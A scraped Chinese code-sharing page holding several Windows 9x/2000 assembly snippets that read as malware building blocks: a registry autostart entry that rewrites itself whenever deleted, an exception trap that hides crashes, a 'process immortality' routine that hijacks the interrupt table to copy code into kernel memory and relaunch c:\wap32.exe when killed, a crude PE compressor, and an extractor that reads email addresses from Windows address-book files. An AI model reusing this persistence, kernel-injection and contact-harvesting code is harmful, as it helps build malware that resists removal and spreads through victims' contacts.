📄
字号:
extrn CreateThread: proc <br>
extrn Sleep: proc <br>
extrn RegQueryValueExA: proc <br>
<br>
start: <br>
push eax <br>
call RegOpenKeyA,080000002h,offset HKeyStr,esp <br>
pop ebx <br>
call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h <br>
<br>
sub esp,100h <br>
mov eax,esp <br>
push 100h <br>
call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp <br>
pop eax <br>
add esp,100h <br>
<br>
push eax <br>
call CreateThread,0,0,offset RegProtectProc,ebx,0,esp <br>
pop eax <br>
call Sleep,1000*60*3 <br>
ret <br>
<br>
RegProtectProc proc hKey:dword <br>
mov ebx,hKey <br>
sub esp,100h <br>
mov edi,esp <br>
call GetProtectKeyName <br>
db 'wap32',0 <br>
GetProtectKeyName: <br>
pop esi <br>
push 100h <br>
call RegQueryValueExA,ebx,esi,0,0,edi,esp <br>
pop eax <br>
WaitRegChangeNotify: <br>
call RegNotifyChangeKeyValue,ebx,0,4,0,0 <br>
call RegSetValueExA,ebx,esi,0,01,edi,100h <br>
jmp short WaitRegChangeNotify <br>
RegProtectProc endp <br>
<br>
end start <br>
<br>
<br>
<br>
3、 Windows 9x/2000 意外处理通用程序 <br>
<br>
<br>
此段程序可以达到屏蔽程序错误的效果 <br>
<br>
include wap32.inc <br>
<br>
.386p <br>
.model flat,stdcall <br>
<br>
extrn MessageBoxA: proc <br>
extrn ExitProcess: proc <br>
<br>
.data <br>
<br>
Msg db 'Fuck',0 <br>
<br>
SetSehFrame: ;ecx=忽略错误继续执行地址 <br>
pop eax ;弹出返回地址 <br>
push ecx ;保存忽略错误继续执行地址 <br>
call PushExceptionProc <br>
jmp short Exception <br>
PushExceptionProc: <br>
push fs:dword ptr[0] <br>
mov fs:[0],esp <br>
call GetEspAddr <br>
push D [edx] ;保存原Esp地址值 <br>
mov [edx],esp <br>
jmp eax <br>
ClearSehFrame: <br>
pop eax ;弹出返回地址 <br>
call GetEspAddr <br>
mov esp,[edx] <br>
pop D [edx] ;恢复原Esp地址值 <br>
pop fs:dword ptr[0] <br>
pop ecx <br>
pop ecx ;弹出忽略错误继续执行地址 <br>
jmp eax <br>
<br>
Exception proc pRecord,pFrame,pContext,pDispatch <br>
call PushSehBackProc <br>
call ClearSehFrame <br>
jmp ecx <br>
PushSehBackProc: <br>
pop ecx <br>
mov eax,pContext <br>
mov [eax.cx_Eip],ecx <br>
xor eax,eax ;忽略错误继续执行 <br>
ret <br>
Exception endp <br>
<br>
GetEspAddr: <br>
call PushOffsetEspAddr <br>
dd ? <br>
PushOffsetEspAddr: <br>
pop edx <br>
ret <br>
<br>
<br>
.code <br>
<br>
Start: <br>
call PushErrorProc <br>
call MessageBoxA,0,offset Msg,offset Msg,0 <br>
ret <br>
PushErrorProc: <br>
pop ecx <br>
call SetSehFrame <br>
mov ds:[0],eax <br>
call ClearSehFrame <br>
ret <br>
<br>
<br>
end Start <br>
<br>
<br>
<br>
4、Windows 9x 下进程不死术<br>
<br>
此段程序首先实现Win9x下注射远程线程(新技术) <br>
然后与Win2k下进程不死术一样了。 <br>
include Win32.inc <br>
<br>
.386p <br>
.model flat,stdcall <br>
<br>
extrn GetProcAddress: proc <br>
extrn WinExec: proc <br>
extrn MessageBoxA: proc <br>
extrn Sleep: proc <br>
extrn GetCurrentProcessId: proc <br>
extrn OpenProcess: proc <br>
extrn GetCurrentProcess: proc <br>
extrn WriteProcessMemory: proc <br>
extrn GetExitCodeProcess: proc <br>
<br>
.data <br>
<br>
;问题,要Sleep()这样做使Kernel32有机会更新数据 <br>
KnlThread proc ProcID:dword <br>
call GetKnlOpenProcess <br>
KnlOpenProcess dd ? <br>
GetKnlOpenProcess: <br>
pop eax <br>
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID <br>
or eax,eax <br>
jz short ExitProtectProc <br>
mov ebx,eax <br>
call GetKnlWaitForSingleObject <br>
KnlWaitForSingleObject dd ? <br>
GetKnlWaitForSingleObject: <br>
pop eax <br>
call [eax],ebx,-1h <br>
call GetFileNameAddress <br>
GetFileNameAddress: <br>
pop ecx <br>
add ecx,offset FileName-offset GetFileNameAddress <br>
call GetKnlWinExec <br>
KnlWinExec dd ? <br>
GetKnlWinExec: <br>
pop eax <br>
call [eax],ecx,01 <br>
ExitProtectProc: <br>
ret <br>
KnlThread endp <br>
<br>
FileName db 'c:\wap32.exe',0 <br>
<br>
KnlOpenProcessStr db 'OpenProcess',0 <br>
KnlWaitForObjectStr db 'WaitForSingleObject',0 <br>
KnlWinExecStr db 'WinExec',0 <br>
KnlSleepStr db 'Sleep',0 <br>
KnlCreateKnlThreadStr db 'CreateKernelThread',0 <br>
<br>
.code <br>
<br>
Start: <br>
call GetProcAddress,0bff70000h,offset KnlOpenProcessStr <br>
mov KnlOpenProcess,eax <br>
call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr <br>
mov KnlWaitForSingleObject,eax <br>
call GetProcAddress,0bff70000h,offset KnlWinExecStr <br>
mov KnlWinExec,eax <br>
<br>
call MoveDataToKnl,offset Start,0bff70600h,100h <br>
<br>
call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr <br>
mov ebx,eax <br>
call GetCurrentProcessId <br>
push eax <br>
call ebx,0,0,0bff70000h+600h,eax,0,esp <br>
pop eax <br>
call MessageBoxA,0,offset FileName,offset FileName,0 <br>
ret <br>
<br>
MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword <br>
push eax <br>
sidt [esp-2] <br>
pop eax <br>
add eax,3*8 <br>
mov ebx,[eax] <br>
mov edx,[eax+4] <br>
call SetIdt03 <br>
pushad <br>
mov [eax],ebx <br>
mov [eax+4],edx <br>
cld <br>
rep movsb <br>
popad <br>
iret <br>
SetIdt03: <br>
cli <br>
pop W[eax] <br>
pop W[eax+6] <br>
mov esi,Src <br>
mov edi,Des <br>
mov ecx,nCx <br>
int 3; <br>
sti <br>
ret <br>
MoveDataToKnl endp <br>
<br>
end Start <br>
<br>
<br>
5、简单算法,高效率压缩PE文件<br>
<br>
.586p <br>
.model flat,STDCALL <br>
.data <br>
<br>
OldFile db 'pe.exe',0 <br>
NewFile db 'pe.zzz',0 <br>
<br>
FileData db 0,0 <br>
.code <br>
extrn _lopen: proc,_lcreat: proc <br>
extrn _lread: proc,_lwrite: proc <br>
extrn _lclose: proc <br>
extrn ExitProcess: proc <br>
start: <br>
call _lopen,offset OldFile,0 <br>
cmp eax,-1 <br>
jz ExitProc <br>
mov esi,eax <br>
call _lcreat,offset NewFile,0 <br>
cmp eax,-1 <br>
jz CloseOldFile <br>
mov edi,eax <br>
<br>
xor ebx,ebx <br>
ReadData: <br>
call _lread,esi,offset FileData,1 <br>
or eax,eax <br>
jz short ReadOver <br>
movzx eax,FileData <br>
or eax,eax <br>
jnz short NoZero <br>
inc ebx <br>
cmp ebx,0ffh <br>
jnz short ReadData <br>
xor eax,eax <br>
mov ah,bl <br>
xchg ax,word ptr FileData <br>
call _lwrite,edi,offset FileData,2 <br>
xor ebx,ebx <br>
jmp short ReadData <br>
NoZero: <br>
or ebx,ebx <br>
jnz short NoZeroData <br>
call _lwrite,edi,offset FileData,1 <br>
jmp short ReadData <br>
NoZeroData: <br>
push eax <br>
xor eax,eax <br>
mov ah,bl <br>
mov word ptr FileData,ax <br>
call _lwrite,edi,offset FileData,2 <br>
xor ebx,ebx <br>
pop eax <br>
mov FileData,al <br>
call _lwrite,edi,offset FileData,1 <br>
jmp ReadData <br>
ReadOver: <br>
or ebx,ebx <br>
jz short CloseFile <br>
xor eax,eax <br>
mov ah,bl <br>
xchg ax,word ptr FileData <br>
call _lwrite,edi,offset FileData,2 <br>
xor ebx,ebx <br>
CloseFile: <br>
call _lclose,edi <br>
CloseOldFile: <br>
call _lclose,esi <br>
ExitProc: <br>
call ExitProcess,0 <br>
<br>
end start <br>
<br>
6、提取Windows地址薄文件(*.WAB)的Email信息<br>
<br>
.586p <br>
.model flat,STDCALL <br>
.data <br>
<br>
MailFile db 'My.WAB',0 <br>
<br>
.code <br>
<br>
extrn _lopen: proc,_lcreat: proc <br>
extrn _lread: proc,_lwrite: proc <br>
extrn _llseek: proc <br>
extrn _lclose: proc <br>
extrn MessageBoxA: proc <br>
extrn ExitProcess: proc <br>
extrn WideCharToMultiByte: proc <br>
<br>
start: <br>
call _lopen,offset MailFile,0 <br>
cmp eax,-1 <br>
jz short ExitProc <br>
mov ebx,eax <br>
sub esp,100h <br>
mov edi,esp <br>
call _lread,ebx,edi,100h <br>
cmp eax,100h <br>
jnz short CloseFile <br>
mov eax,[edi+60h] ;得到Unicode邮件名偏移 <br>
call _llseek,ebx,eax,0 <br>
mov ecx,[edi+64h] ;得到Unicode邮件名个数 <br>
ContWabMail: <br>
push ecx <br>
call _lread,ebx,edi,44h ;读一个记录 <br>
cmp eax,44 <br>
sub esp,100h <br>
mov eax,esp <br>
call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0 <br>
mov eax,esp <br>
call MessageBoxA,0,eax,eax,0 <br>
add esp,100h <br>
pop ecx <br>
loop short ContWabMail <br>
CloseFile: <br>
call _lclose,ebx <br>
ExitProc: <br>
call ExitProcess,0 <br>
<br>
end start <br>
<br>
</p>
<!--mstheme--></font>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -